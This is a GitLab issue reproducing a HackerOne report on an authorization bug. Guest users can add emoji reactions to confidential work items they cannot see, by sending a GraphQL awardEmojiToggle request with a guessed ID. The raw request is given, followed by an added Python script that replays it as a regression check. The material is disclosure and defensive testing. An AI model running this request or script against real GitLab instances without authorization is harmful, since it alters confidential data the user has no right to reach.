Guest users can react (emojis) on confidential work items which they can't see in a project
HackerOne report #2036500 by ashish_r_padelkar
on 2023-06-23, assigned to @ottilia_westerlund:
Report
Hello,
Confidential tasks can be created for an issue within a project. These confidential tasks (work items) are created as issues and are visible only to Reporter or higher user roles.
There is a bug where guest users within a project can react with emojis to such private tasks/work items even when they are confidential and cannot be seen.
Steps to reproduce
1. Go to https://gitlab.com/<groupNamespace>/<projectNamespace>/-/issues and create an issue.
2. Now add a confidential task to it using the option below.
3. Add a guest user to your project or group at https://gitlab.com/groups/<groupNamespace>/-/group_members.
4. Log in as the guest user.
5. Go to the issue created in step 1.
6. You see the issue but not the task, as it's private.
7. Guess the private task item ID and replace it in the GraphQL request below.
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: 1
Content-Length: 316
X-Gitlab-Feature-Category: team_planning
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
X-Csrf-Token: 1
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Sec-Ch-Ua-Platform: "macOS"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com/groupjune23/latest_project/-/work_items/25
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
[{"operationName":"updateWorkItemAwardEmojiWidget","variables":{"input":{"awardableId":"gid://gitlab/WorkItem/128497667","name":"thumbsup"}},"query":"mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {\n awardEmojiToggle(input: $input) {\n errors\n toggledOn\n __typename\n }\n}\n"}]
Where 128497667 is the private task ID.
8. Also replace your Cookie and X-Csrf-Token.
9. Send the request and it will be successful.
Now, as an admin, check the private work item/task. You should see a thumbsup reaction on it. This happens despite the guest user not being able to see that task.
What is the current bug behavior?
Guest users can react with emojis on private work items which they can't see within a project.
What is the expected correct behavior?
Only users who have access to private work items should be able to react on them.
Output of checks
This bug happens on GitLab.com. GitLab Enterprise Edition 16.2.0-pre 2a4d9de2b78
Regards,
Ashish
Impact
Guest users can react on confidential work items which they can't see in a project
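The reproduction above is a hand-edited browser request. The script below, added here as an example and not code from the reporter or from GitLab, turns it into a repeatable check: it sends the same awardEmojiToggle mutation against a work item ID, authenticated with a personal access token of a Guest member instead of the browser cookie and CSRF token, and classifies the answer as "vulnerable" (the toggle went through), "fixed" (authorization was enforced) or "unexpected". The endpoint URL, the environment variable name and the wording of GitLab's permission-denied message it looks for are assumptions; the mutation, field names and GID format are taken from the report.

```python
"""Regression check for the report above: can a Guest toggle an award emoji on a
confidential work item it cannot read?  Sends the report's awardEmojiToggle mutation
with a personal access token and classifies the server's answer.
Added example; not GitLab code and not the reporter's."""
import json
import os
import sys
import urllib.request

GITLAB_GRAPHQL = "https://gitlab.com/api/graphql"  # assumption: GitLab.com; change for self-managed

# Same mutation the report sends from the work-item page (field names from the report).
TOGGLE_AWARD_EMOJI = """
mutation updateWorkItemAwardEmojiWidget($input: AwardEmojiToggleInput!) {
  awardEmojiToggle(input: $input) {
    errors
    toggledOn
  }
}
"""


def work_item_gid(work_item_id: int) -> str:
    """Global ID format used in the report: gid://gitlab/WorkItem/<numeric id>."""
    return f"gid://gitlab/WorkItem/{int(work_item_id)}"


def build_toggle_request(work_item_id: int, emoji: str = "thumbsup") -> dict:
    """JSON body for one awardEmojiToggle call (a single operation, not the batched
    array the browser sent in the report)."""
    return {
        "operationName": "updateWorkItemAwardEmojiWidget",
        "query": TOGGLE_AWARD_EMOJI,
        "variables": {"input": {"awardableId": work_item_gid(work_item_id), "name": emoji}},
    }


def classify_toggle_response(resp: dict) -> str:
    """Decide what the server's answer means for the access check.

    'vulnerable'  the toggle succeeded (no errors at either level) for a caller who
                  cannot read the work item, i.e. the behaviour in the report.
    'fixed'       authorization was enforced: a top-level GraphQL error (assumption:
                  GitLab phrases a denied resource as "...does not exist or you don't
                  have permission...") or a mutation-level error.
    'unexpected'  anything else (transport problem, schema change); inspect by hand.
    """
    top_errors = resp.get("errors") or []
    payload = (resp.get("data") or {}).get("awardEmojiToggle")
    if payload is None:
        messages = " ".join(str(e.get("message", "")) for e in top_errors).lower()
        if "permission" in messages or "does not exist" in messages:
            return "fixed"
        return "unexpected"
    if payload.get("errors"):
        return "fixed"
    # toggledOn is True when the reaction was added and False when it was removed;
    # either way the caller was allowed to change a reaction on the item.
    if isinstance(payload.get("toggledOn"), bool):
        return "vulnerable"
    return "unexpected"


def send_graphql(token: str, body: dict, url: str = GITLAB_GRAPHQL) -> dict:
    """POST one GraphQL operation using a personal access token as Bearer auth."""
    req = urllib.request.Request(
        url,
        data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json", "Authorization": f"Bearer {token}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as r:
        return json.load(r)


if __name__ == "__main__":
    # Usage: GITLAB_GUEST_TOKEN=<PAT of a Guest member> python check.py <confidential work item id>
    token = os.environ.get("GITLAB_GUEST_TOKEN")  # assumption: variable name chosen for this example
    if not token or len(sys.argv) != 2:
        sys.exit("usage: GITLAB_GUEST_TOKEN=... check.py <work_item_id>")
    verdict = classify_toggle_response(send_graphql(token, build_toggle_request(int(sys.argv[1]))))
    print(verdict)
    sys.exit(1 if verdict == "vulnerable" else 0)
```

Two caveats when running it for real: the mutation is a toggle, so on an unfixed instance a first run adds the reaction and a second run removes it again, which is the state you want to leave behind; and a correct fix should answer a Guest with the same "does not exist or no permission" error for a confidential work item as for a non-existent ID, otherwise the error itself confirms which guessed IDs are real.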
Attachments
Warning: Attachments received through HackerOne, please exercise caution!